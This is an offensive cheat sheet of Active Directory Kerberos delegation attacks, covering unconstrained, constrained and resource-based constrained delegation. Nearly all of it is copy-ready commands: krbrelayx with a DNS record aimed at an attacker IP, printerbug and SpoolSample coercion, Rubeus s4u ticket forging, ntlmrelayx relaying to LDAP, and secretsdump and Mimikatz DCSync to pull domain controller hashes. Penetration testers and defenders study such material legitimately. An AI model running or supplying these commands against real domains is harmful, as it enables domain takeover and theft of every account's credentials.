# Nice resource on the difference between user accounts and machine accounts in Unconstrained Delegation (UC)
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
# AD objects with Unconstrained Delegation have the TRUSTED_FOR_DELEGATION flag set
# You can search for such users using Pywerview
$ python pywerview.py get-netuser -u ownedUser -p userPassword -d foo.lan -t dc1.foo.lan --unconstrained
# You can also dump the domain with ldapdomaindump and then grep the output for the flag
$ ldapdomaindump -u "foo.lan\\ownedUser" -p "userPassword" 192.168.30.10
$ grep TRUSTED_FOR_DELEGATION *.grep
# Using Powershell and the ADModule (https://github.com/samratashok/ADModule)
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
# Compromised User having Unconstrained Delegation
# 1/ Add a fake SPN using the ownedUser account
$ python addspn.py -u foo.lan\\ownedUser -p userPassword -s host/PWNED.foo.lan ldap://dc1.foo.lan
# 2/ Create a new DNS record pointing the fake SPN to our attacking IP
$ python dnstool.py -u foo.lan\\ownedUser -p userPassword -r PWNED.foo.lan -a add -d <attacker-IP> DC1.foo.lan
# 3/ In one shell, start krbrelayx (salt is case sensitive!)
$ sudo python krbrelayx.py --krbsalt foo.lanownedUser --krbpass userPassword
# 4/ In another shell
$ python printerbug.py foo.lan/ownedUser:userPassword@DC1.foo.lan PWNED.foo.lan
# It will force the target DC to connect to our fake new "computer" configured through
# Unconstrained Delegation. The request embeds a copy of the DC$ TGT, which krbrelayx saves.
# Then...
export KRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc
# Compromised Machine/Server having Unconstrained Delegation
# If you compromised a machine having UC you can use it to get a copy of the DC's TGT
# In Powershell you can check for the spoolss presence
PS> ls \\<dc-ip>\pipe\spoolss
# On the compromised machine, start monitoring with Rubeus
Rubeus.exe monitor /interval:1
# Then using the SpoolSample PoC (https://github.com/leechristensen/SpoolSample)
# you can force the DC to connect to the owned machine
# Delegation being set, you will get a copy of the DC$ TGT in Rubeus
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
Constrained Delegation
# AD objects with Constrained Delegation have the TRUSTED_TO_AUTH_FOR_DELEGATION flag set
# The msDS-AllowedToDelegateTo attribute lists the services involved in the delegation rights
# The goal is to get a ticket for an impersonated user on a service we have delegation rights to
getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD
# It is then possible to modify the service name portion of the ticket (it is not encrypted)
# Impacket automatically updates the sname in the backend
# The following post describes this behavior
https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
# Once the ticket has been generated, we can use it
export KRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc
RBCD Exploitation
https://github.com/aas-n/leHACK19
# Microsoft is releasing an update in March 2020 that will enable LDAP channel binding & LDAP
# signing by default on Windows systems, remediating this potential attack vector on fully patched systems.
# When to use:
# Basically, when you're on a network and want to get a shell on a different system on that same network segment.
# This attack can be run without needing any prior credentials.
# However, the method described does require that a domain controller in the environment is configured with LDAPS.
# From Windows Hosts
# Importing Powerview and Powermad
Import-Module .\Powerview.ps1
Import-Module .\Powermad.ps1
# Authentication
$TargetComputer="DC01.domain.lan"
$SecPassword= ConvertTo-SecureString 'passw0rd' -AsPlainText -Force
$Cred= New-Object System.Management.Automation.PSCredential('DOMAIN\ControlledAccount', $SecPassword)
# Get our user's SID
$AttackerSID= Get-DomainUser ControlledUser -Credential $Cred -Server 10.10.10.10 -Properties objectsid | Select -Expand objectsid
$ACE= Get-DomainObjectACL $TargetComputer -Credential $Cred -Server 10.10.10.10 | ?{$_.SecurityIdentifier -match $AttackerSID}
# Adding a machine account and getting its SID
New-MachineAccount -Credential $Cred -Domain domain.lan -DomainController 10.10.10.10 -MachineAccount lleXXXXX -Password $(ConvertTo-SecureString 'passw0rd' -AsPlainText -Force)
$ComputerSID= Get-DomainComputer lleXXXXX -Credential $Cred -Server 10.10.10.10 -Properties objectsid | Select -Expand objectsid
# Creating the security descriptor to store in msDS-AllowedToActOnBehalfOfOtherIdentity on the DC
$SD= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSID))"
$SDBytes= New-Object byte[]($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Rewrite the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC
Get-DomainComputer $TargetComputer -Credential $Cred -Server 10.10.10.10 | Set-DomainObject -Credential $Cred -Server 10.10.10.10 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# Now you can impersonate the domain admin account on the DC using the machine account
.\Rubeus.exe hash /password:passw0rd /user:lleXXXXX /domain:domain.lan
.\Rubeus.exe s4u /user:lleXXXXX$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:ldap/DC01.domain.lan /ptt /dc:10.10.10.10 /domain:domain.lan
.\Rubeus.exe klist
# Then, you can get the NTLM hash of domain admin using DCSync and Mimikatz
.\Mimikatz.exe
mimikatz> lsadump::dcsync /user:domain\Adminisrator /domain:domain.lan /dc:DC01.domain.lan
# From Linux Hosts
# First step is creating a computer account in order to control a computer account with SPNs
addcomputer.py -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD
# Then you want to intercept NTLM hashes and forward them to LDAP on a DC
# It allows you to impersonate the relayed account and set msDS-AllowedToActOnBehalfOfOtherIdentity
ntlmrelayx.py -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DC.DOMAIN.LOCAL
ntlmrelayx.py -wh COMPUTER.DOMAIN.LOCAL --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DC.DOMAIN.LOCAL
# Then, start a relay tool (mitm6, responder...)
# If another host authenticates successfully and grants impersonation rights, we can then use them
# Then you will want to get a valid TGS to connect to the server using our new delegation rights
# We can for example choose to impersonate administrators
getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD
export KRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc